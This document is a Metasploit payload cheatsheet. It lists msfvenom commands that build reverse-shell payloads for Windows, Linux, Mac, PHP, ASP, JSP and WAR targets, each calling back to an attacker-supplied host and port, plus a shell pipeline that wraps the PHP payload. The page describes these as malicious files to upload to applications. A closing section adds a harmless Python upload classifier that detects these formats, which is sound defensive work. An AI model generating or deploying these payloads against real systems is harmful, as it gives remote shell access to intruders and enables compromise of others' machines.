Cheatsheet: Metasploit Payloads

Windows

You can use the following command in order to create an EXE file for a Windows machine.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f exe > shell.exe

Linux

In order to gain access to a Linux host, an ELF file must be created. You can use the following line for that.

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f elf > shell.elf

Mac

Mach-O, short for Mach object file format, is a file format for executables, object code, shared libraries, dynamically-loaded code, and core dumps. A replacement for the a.out format, Mach-O offers more extensibility and faster access to information in the symbol table. Mach-O is used by most systems based on the Mach kernel. A malicious Mach-O file can be created using Metasploit with the following command.

msfvenom -p osx/x86/shell_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f macho > shell.macho

PHP

When you have access to a PHP interpreter, you can always create a reverse shell with Metasploit using the following two lines. The second line wraps the contents of shell.php in PHP tags.

msfvenom -p php/meterpreter_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f raw > shell.php
cat shell.php | xclip -selection clipboard && echo "<?php " > shell.php && xclip -selection clipboard -o >> shell.php && echo && echo " ?>" >> shell.php

ASP

ASP and ASP.NET are server-side technologies. Both enable computer code to be executed by a web server. When a browser requests an ASP or ASP.NET file, the ASP engine reads the file, executes any code in the file, and returns the result to the browser. In order to create an ASP shell with Metasploit, you can use the following line.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f asp > shell.asp

JSP

JavaServer Pages (JSP) is a technology that helps software developers create dynamically generated web pages based on HTML, XML, or other document types. Released in 1999 by Sun Microsystems, JSP is similar to PHP, ASP and React’s JSX, but it uses the Java programming language. In order to create a JSP shell with Metasploit, you can use the following line.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f raw > shell.jsp

WAR

A web application archive (hereinafter WAR) is a simple JAR file used to distribute a collection of JSP, Java Servlets, Java classes and many other resources. An attacker can create a malicious WAR file and upload it to many applications in order to get back command execution (see Tomcat war file upload). In order to create a malicious WAR file using Metasploit you can use the following line of code.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Your IP] LPORT=[Your Port] -f war > shell.war
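
On the defending side, every format on this page can be recognized by content at an upload boundary, whatever the file is named. The following check is an added example, not part of the original cheatsheet; `classify_upload`, `make_sample_war` and the finding labels are hypothetical names, and all sample inputs are constructed and harmless.

```python
import io
import zipfile

# Leading magic bytes of the native formats this page covers (EXE, ELF, Mach-O).
NATIVE_MAGIC = {
    b"MZ": "pe",
    b"\x7fELF": "elf",
    b"\xfe\xed\xfa\xce": "macho", b"\xce\xfa\xed\xfe": "macho",  # 32-bit
    b"\xfe\xed\xfa\xcf": "macho", b"\xcf\xfa\xed\xfe": "macho",  # 64-bit
}
SCRIPT_EXTS = (".php", ".asp", ".aspx", ".jsp", ".jspx")
SCRIPT_MARKERS = (b"<?php", b"<%")  # PHP open tag; ASP/JSP scriptlet delimiter


def classify_upload(filename: str, data: bytes) -> list[str]:
    """Return reasons to reject an upload; an empty list means none were found."""
    findings = []
    if filename.lower().endswith(SCRIPT_EXTS):
        findings.append("script-extension")
    native = next((k for m, k in NATIVE_MAGIC.items() if data.startswith(m)), None)
    if native:
        findings.append(f"native-executable:{native}")
    elif data.startswith(b"PK\x03\x04"):  # ZIP container: JAR and WAR files live here
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = [n.lower() for n in zf.namelist()]
        except zipfile.BadZipFile:
            findings.append("malformed-zip")
        else:
            if any(n.startswith("web-inf/") for n in names):
                findings.append("war-archive")
            if any(n.endswith(SCRIPT_EXTS) for n in names):
                findings.append("archive-contains-script")
    elif any(m in data[:4096].lower() for m in SCRIPT_MARKERS):
        findings.append("script-marker")  # content is a script whatever the name says
    return findings


def make_sample_war() -> bytes:
    """Constructed sample: a harmless in-memory WAR with one JSP and a web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("index.jsp", "<% out.println(\"hello\"); %>")
    return buf.getvalue()


if __name__ == "__main__":
    print(classify_upload("avatar.png", b"MZ\x90\x00" + b"\x00" * 60))
    print(classify_upload("notes.txt", b"<?php echo 1; ?>"))
    print(classify_upload("plugin.zip", make_sample_war()))
```

A check like this belongs alongside, not instead of, storing uploads outside any directory the web server or application container will execute or deploy from.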
